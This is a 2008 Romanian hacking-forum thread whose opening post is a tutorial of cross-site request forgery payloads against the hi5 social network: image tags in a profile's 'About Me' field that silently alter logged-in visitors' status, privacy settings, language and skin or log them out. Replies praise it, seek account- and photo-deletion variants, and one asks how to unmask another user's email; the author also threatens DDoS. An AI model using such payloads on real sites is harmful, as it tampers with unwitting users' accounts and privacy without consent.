It is currently Fri Sep 10, 2010 10:33 am




Post new topic Reply to topic  [ 77 posts ]  Go to page 1, 2, 3  Next
Vulnerabilitati hi5 
Author Message
Moderator
User avatar

Joined: Sat Aug 04, 2007 1:00 pm
Posts: 290
Post Vulnerabilitati hi5
1. Schimbarea statusului

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/profile/editScrapbookTopicAjax.do?topic=www.hackpedia.info&editorId=topic">


Toti cei care sunt logati pe hi5 si va vizualizeaza pagina vor avea la status scris cuvantul http://www.hackpedia.info. Desigur ca puteti sa scrieti ce vreti in loc de adresa noastra. Statusul apare chiar pe prima pagina a profilului lor ;)

2. Delogarea automata

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/logoff.do">


Cei care sunt logati pe hi5 si va viziteaza profilul vor fi automat delogati de pe contul lor.

3. Manipularea optiunilor din privacy

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=profileviewable&value=1&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca profilul lor sa fie vizibil de oricine.

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=book
&value=0&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca orice user sa le poata comenta profilul.

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=autoacceptprofilecomment&value=0&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca orice comment sa fie aprobat automat.

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=friend
&value=0&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca orice persoana sa le poata face cerere de prietenie.

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=message&value=0&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca orice persoana sa le poata trimite mesaj.

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=five
&value=0&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca orice persoana sa le poata da un five.

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=emailpref&value=0&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) sa primeasca notificari prin mail

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=phototaggingallowfriends&value=1&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca prietenii sa ii poata da tag-uri la poze.

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=comment&value=0&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca oricine sa poata face commenturi la poze.

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=autoacceptphotocomment&value=0&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca toate commenturile de la poze sa fie aprobate automat.

--------------------------------------

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editPrivacy.do?opt=onlinestatus&value=0&_=">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) ca toti userii sa le poata vedea statusul online (cel de la punctul 1 al acestui tutorial)

4. Schimbarea limbii

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/account/editAccountLocale.do
&defaultLanguage=el_GR">


Cei care sunt logati pe hi5 si va viziteaza profilul vor seta automat (fara sa aiba idee de acest lucru) sa aiba profilul scris in greaca.

Lista cu toate limbile disponibile (schimbati el_GR din tagul de mai sus cu extensiile de mai jos in functie de ce limba vreti sa aiba setata vizitatorii):

1. cs_CZ
2. de
3. en
4. es_AR
5. es_ES
6. es_MX
7. fr
8. hu_HU
9. it
10. ja
11. nl
12. pl
13. pt
14. ro
15. ru
16. th_TH
17. tr
18. uk_UA
19. zh_CN
20. zh_TW

Recomand limbile de la punctele 10, 19, 20

4. Schimbarea skinului sau stergerea lui

Logati-va pe contul vostru si accesati urmatorul link: http://hi5.com/friend/profile/editBasic.do

La rubrica "About Me" introduceti urmatorul cod:
Code:
<img src="http://hi5.com/friend/profile/removeSkin.do">

ce va sterge skinul de pe profilul vizitatorilor.

Tot la rubrica "About Me" introduceti:

Code:
<img src="http://hi5.com/friend/profile/selectSkin.do?skinId=13098629">

si automat toti cei care va viziteaza profilul (logati) vor seta automat pe conturile lor skinul respectiv.

Pentru intreaga lista de skinuri intrati la adresa http://hi5.com/friend/account/displayChooseSkin.do si schimbati linkul din tag-uri cu cel de la skinul pe care vreti sa il setati.

TOT CE ESTE PREZENTAT LA PUNCTUL 3 AFECTEAZA DOAR FIREFOX. Pentru a face totusi o versiune functionabila si pentru alte browsere puteti folosi linkuri normale de genul:
Code:
<a href="http://hi5.com/friend/account/editPrivacy.do?opt=book&value=0">DA CLICK AICI</a>


Acestea sunt doar o mica parte din problemele hi5. Vulnerabilitatile grave nu vi le voi prezenta pentru ca ne folosim de ele in alte scopuri mai importante decat stricarea unor profile de ratati.

NU intrebati "cum se face" sau sa va aud ca spuneti "nu merge". Am explicat pentru tot prostul.

Copyright Nemessis - tutorial creeat pentru http://www.rstzone.org si http://hackpedia.info . Orice folosire a acestui text sau a mijloacelor prezentate in text fara a preciza sursa si/sau autorul va duce la un mare DDOS pe siteurile unde va aparea fara a se respecta aceasta regula


Fri Mar 28, 2008 7:34 pm
Profile
Moderator
User avatar

Joined: Thu Jul 26, 2007 11:03 am
Posts: 297
Location: Buzau
Post Re: Vulnerabilitati hi5
salut nemessis...
citind un post de-al tau dintr-un topic de aici...am descoperit si eu pe cea de la 2 :)
intradevar este ceva interesant...eu ma gandeam ca aia a fost un bug...dar se pare ca se pot face mult mai multe:)
felicitari ptr acest "tutorial".....chiar dragut :)
si sa stii ca ai luat o decizie buna ca nu prezinti vulnerabilitatile grave(ai putea sa o faci dar numai intr-un mod privat.....de ex in area51 pe rstzone:P)
bafta :)


Fri Mar 28, 2008 7:59 pm
Profile
Moderator
User avatar

Joined: Sat Aug 04, 2007 1:00 pm
Posts: 290
Post Re: Vulnerabilitati hi5
Merci. Am facut niste greseli la privacy options. O sa revin cu un edit care le va rezolva sper.

Later edit: TOT CE ESTE PREZENTAT LA PUNCTUL 3 AFECTEAZA DOAR FIREFOX. Pentru a face totusi o versiune functionabila si pentru alte browsere puteti folosi linkuri normale de genul:
Code:
<a href="http://hi5.com/friend/account/editPrivacy.do?opt=book&value=0">DA CLICK AICI</a>


Fri Mar 28, 2008 8:09 pm
Profile
Grand Member
User avatar

Joined: Sun Jan 20, 2008 2:17 pm
Posts: 353
Post Re: Vulnerabilitati hi5
oo da` foarte buna treaba nemessis :lovers:


Fri Mar 28, 2008 8:24 pm
Profile
Grand Member
User avatar

Joined: Mon Jul 30, 2007 4:02 pm
Posts: 376
Location: Pe Langa Banat
Post Re: Vulnerabilitati hi5
Foarte frumos Nemessis îmi place cum ai lucrat ... la Explorer e cam greu să îş fraireşti să dea click dar merge şi aşa.
Baftă şi la mai multe.


Sat Mar 29, 2008 7:02 pm
Profile
Senior Member
User avatar

Joined: Thu Aug 02, 2007 10:07 pm
Posts: 167
Location: Romania
Post Re: Vulnerabilitati hi5
buna treaba Nemessis :wub: sper sa mearga inca nu am incercat :bounce2:


Sun Mar 30, 2008 6:05 am
Profile
Elite
User avatar

Joined: Thu Mar 27, 2008 5:11 pm
Posts: 896
Location: Ploiesti city, Est
Post Re: Vulnerabilitati hi5
Merg...am incercat cel putin 2 dintre ele...buna treaba :wub:


Wed Apr 02, 2008 3:50 pm
Profile
New Member

Joined: Mon Aug 06, 2007 8:30 pm
Posts: 56
Post Re: Vulnerabilitati hi5
Daca neai ajuta putin si aici ar fi treaba buna :D http://hi5.com/friend/account/displayRemoveAcct.do

Respectele mele


Thu Apr 10, 2008 3:30 am
Profile
Senior Member

Joined: Sun Jan 20, 2008 4:49 pm
Posts: 153
Location: http://betablog.org
Post Re: Vulnerabilitati hi5
Mickydutz2005 wrote:
Daca neai ajuta putin si aici ar fi treaba buna :D http://hi5.com/friend/account/displayRemoveAcct.do

Respectele mele

<img src="http://hi5.com/friend/account/displayRemoveAcct.do">


Thu Apr 10, 2008 2:18 pm
Profile
New Member

Joined: Mon Aug 06, 2007 8:30 pm
Posts: 56
Post Re: Vulnerabilitati hi5
betas0ft wrote:
Mickydutz2005 wrote:
Daca neai ajuta putin si aici ar fi treaba buna :D http://hi5.com/friend/account/displayRemoveAcct.do

Respectele mele

<img src="http://hi5.com/friend/account/displayRemoveAcct.do">



betas0ft .....asta stiam si eu......dar te duce la pagina unde sa ii dai delete......dupa http://hi5.com/friend/account/displayRemoveAcct.do lipseste ceva :) cum ar fi : ?opt1.....blabla bal......la aia ma referam.... :bow: :bow:


Thu Apr 10, 2008 6:06 pm
Profile
Moderator
User avatar

Joined: Sat Aug 04, 2007 1:00 pm
Posts: 290
Post Re: Vulnerabilitati hi5
Nu poate fi facut atat de simplu deoarece cere datele de logare. Solutia este: http://hi5.com/friend/account/deleteUse ... &password=, dar campul email si campul password au nevoie de datele corecte de logare.


Fri Apr 11, 2008 12:24 pm
Profile
New Member

Joined: Mon Aug 06, 2007 8:30 pm
Posts: 56
Post Re: Vulnerabilitati hi5
Nemessis wrote:
Nu poate fi facut atat de simplu deoarece cere datele de logare. Solutia este: http://hi5.com/friend/account/deleteUse ... &password=, dar campul email si campul password au nevoie de datele corecte de logare.


Thx .....miam dat seama....mam uitat din nou.....

Dar cu stersu pozelor merge sigur:P.....
Daca stii...nu posta....ca maine vezi ca sau sters XXXXX poze .....=))


Sat Apr 12, 2008 4:59 am
Profile
New Member

Joined: Thu Apr 17, 2008 6:57 am
Posts: 1
Post Re: Vulnerabilitati hi5
GG Nemessis foarte tare.
O intrebare am cum ti-a trecut prin cap sa incerci astea? :)


Thu Apr 17, 2008 7:05 am
Profile
New Member
User avatar

Joined: Sat Apr 19, 2008 9:47 pm
Posts: 30
Post Re: Vulnerabilitati hi5
Salutare! Super codurile Nemessis!!!Are cineva programelul asta de aici?Chiar si in versiune demo http://hi5-email.com.Si daca l-a incercat cineva sa imi zica daca a mers.Vad ca pe pagina oficiala linkul de download nu merge.Ms!


Sat Apr 19, 2008 9:51 pm
Profile
Elite
User avatar

Joined: Thu Mar 27, 2008 5:11 pm
Posts: 896
Location: Ploiesti city, Est
Post Re: Vulnerabilitati hi5
lollypop wrote:
Salutare! Super codurile Nemessis!!!Are cineva programelul asta de aici?Chiar si in versiune demo http://hi5-email.com.Si daca l-a incercat cineva sa imi zica daca a mers.Vad ca pe pagina oficiala linkul de download nu merge.Ms!


Cam scump...mai bine ii lasi proprietarului hi5ului un comment " salut ..bla bla...ai id de mess? "


Sun Apr 20, 2008 1:20 am
Profile
Moderator
User avatar

Joined: Sat Aug 04, 2007 1:00 pm
Posts: 290
Post Re: Vulnerabilitati hi5
First Name: Liviu-Mihail
Last Name: Concioiu
Address: Dragasani 245700, Romania
Reference: Write your email.

Cum sa ai incredere intr-un valcean? E teapa 90%


Sun Apr 20, 2008 1:57 am
Profile
New Member
User avatar

Joined: Sat Apr 19, 2008 9:47 pm
Posts: 30
Post Re: Vulnerabilitati hi5
L-am cautat si eu pe google pe individul asta si se mai plangea careva de el.Am vazut ca e un pustan insa poate chiar a fost functionabil programelul ala de asta ziceam...Iti dai seama ca e teapa odata ce nu merge linkul de download.Dar stie careva cum pot afla adresa de mail a unui user care ma cam sacaie de pe hi 5?I-am cerut personal un id de mess insa nu corespunde cu cel de pe care si-a facut contul pe hi5.Stiu ca este posibil acest lucru 100%. :p


Sun Apr 20, 2008 5:28 pm
Profile
New Member

Joined: Sun May 04, 2008 9:24 pm
Posts: 2
Post Re: Vulnerabilitati hi5
foarte interesante articolele tale Nemessis, keep up the great work.


Wed May 07, 2008 10:21 am
Profile
New Member
User avatar

Joined: Sun Mar 16, 2008 2:08 pm
Posts: 36
Post Re: Vulnerabilitati hi5
daca ai gasi si ca sa stearga commenturile cum era inainte ....ar fi ceva .......oricum gg


Wed May 07, 2008 6:38 pm
Profile
New Member
User avatar

Joined: Sat Apr 19, 2008 9:47 pm
Posts: 30
Post Re: Vulnerabilitati hi5
Pentru ascunderea listei de prieteni introduceti la rubrica "about me" urmatorul cod:

<style>#friends {display: none;}</style>


Mon Jun 02, 2008 11:59 am
Profile
Elite
User avatar

Joined: Thu Mar 27, 2008 5:11 pm
Posts: 896
Location: Ploiesti city, Est
Post Re: Vulnerabilitati hi5
lollypop wrote:
Pentru ascunderea listei de prieteni introduceti la rubrica "about me" urmatorul cod:

<style>#friends {display: none;}</style>



A mers, merci.
Insa o nelamurire, adica , sa zicem o cerere, se poate face acelasi lucru, dar sa ramana doar topul prietenilor, adica sa nu apara prietenii comuni :).
Edit1: ERA INTREBARE


Mon Jun 02, 2008 7:24 pm
Profile
New Member

Joined: Fri Jun 27, 2008 10:36 pm
Posts: 49
Post Re: Vulnerabilitati hi5
Sooooper cool!!!!!!!!!!! :thumbup: :thumbup:


Fri Jun 27, 2008 11:58 pm
Profile
New Member
User avatar

Joined: Sat Apr 19, 2008 9:47 pm
Posts: 30
Post Re: Vulnerabilitati hi5
Mihay... scuze pentru intarzaiere insa nu stiu un asemenea cod.Poate ne ajuta Nemessis :thumbup:


Sun Jun 29, 2008 10:12 pm
Profile
Elite
User avatar

Joined: Thu Mar 27, 2008 5:11 pm
Posts: 896
Location: Ploiesti city, Est
Post Re: Vulnerabilitati hi5
@lollypop - Nu e nimic...m-am obisnut sa fiu lasat la urma ... :D

Mai astfel de coduri? Sunt f. tari :D .

Respectele mele... :thumbup:


Mon Jun 30, 2008 12:12 pm
Profile
New Member
User avatar

Joined: Sat Apr 19, 2008 9:47 pm
Posts: 30
Post Re: Vulnerabilitati hi5
Nu mai am coduri insa am gasit aici o pagina cu mai multe coduri:
http://www.hi5mods.com/hide-codes.php :lol:


Tue Jul 01, 2008 4:54 pm
Profile
Moderator
User avatar

Joined: Sat Aug 04, 2007 1:00 pm
Posts: 290
Post Re: Vulnerabilitati hi5
Update: cei de la hi5 au patchuit bugurile respective.


Mon Jul 14, 2008 4:29 pm
Profile
Banned
User avatar

Joined: Sat Apr 26, 2008 9:56 pm
Posts: 874
Post Re: Vulnerabilitati hi5
Nemessis wrote:
Update: cei de la hi5 au patchuit bugurile respective.

de aia nu e bine sa faci bugurile publice :p


Thu Jul 17, 2008 5:30 pm
Profile
New Member

Joined: Sun Aug 10, 2008 2:59 pm
Posts: 2
Post Re: Vulnerabilitati hi5
hei ma ajutati cu ceva??? :D


Sun Aug 10, 2008 3:26 pm
Profile
Elite
User avatar

Joined: Thu Mar 27, 2008 5:11 pm
Posts: 896
Location: Ploiesti city, Est
Post Re: Vulnerabilitati hi5
umy wrote:
hei ma ajutati cu ceva??? :D

a?


Mon Aug 11, 2008 2:01 am
Profile
Junior Member

Joined: Sat Feb 02, 2008 12:04 am
Posts: 126
Post Re: Vulnerabilitati hi5
umy wrote:
hei ma ajutati cu ceva??? :D



Pai cu ce ? :cursing: Cum vrei sa te ajutam daca nu stim la ce ai nevoie. :wub:


Sun Aug 31, 2008 7:54 pm
Profile
 
Post new topic Reply to topic  [ 77 posts ]  Go to page 1, 2, 3  Next


Who is online

Users browsing this forum: No registered users and 0 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Search for:
Jump to:  
Powered by phpBB © phpBB Group.
Designed by boogiesbc and Vjacheslav Trushkin .